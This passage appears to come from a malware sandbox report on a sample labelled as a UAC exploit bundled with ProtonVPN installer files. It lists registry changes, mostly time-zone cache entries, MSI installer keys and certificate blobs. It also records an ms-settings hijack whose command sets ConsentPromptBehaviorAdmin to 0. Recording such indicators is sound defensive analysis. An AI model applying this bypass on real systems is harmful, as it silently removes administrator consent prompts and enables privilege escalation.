Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" csrss.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" csrss.exe -
Modifies registry class 38 IoCs
Processes:
msiexec.exereg.exereg.exefirefox.exereg.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpreg.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\ProductIcon = "C:\\Windows\\Installer\\{C23BCE3A-FD25-48BA-948E-2CE94576F983}\\protonvpn.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\PackageName = "ProtonVPNTap.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A3ECB32C52DFAB8449E8C29E54679F38 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\ProductName = "ProtonVPNTap" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " " reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " " reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\Version = "16777217" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F7F9B32EA0AAA184E8ACAF9697B45FA0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F7F9B32EA0AAA184E8ACAF9697B45FA0\A3ECB32C52DFAB8449E8C29E54679F38 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" reg.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A3ECB32C52DFAB8449E8C29E54679F38\MainFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\PackageCode = "D45C995E40EE28D4F8E7856ABE7E2452" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\{C23BCE3A-FD25-48BA-948E-2CE94576F983}\\576F983\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open reg.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\ms-settings\shell\open\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A3ECB32C52DFAB8449E8C29E54679F38\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\{C23BCE3A-FD25-48BA-948E-2CE94576F983}\\576F983\\" msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
ProtonVPN.exeProtonVPNTap.execsrss.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f ProtonVPN.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f ProtonVPNTap.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD ProtonVPN.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203a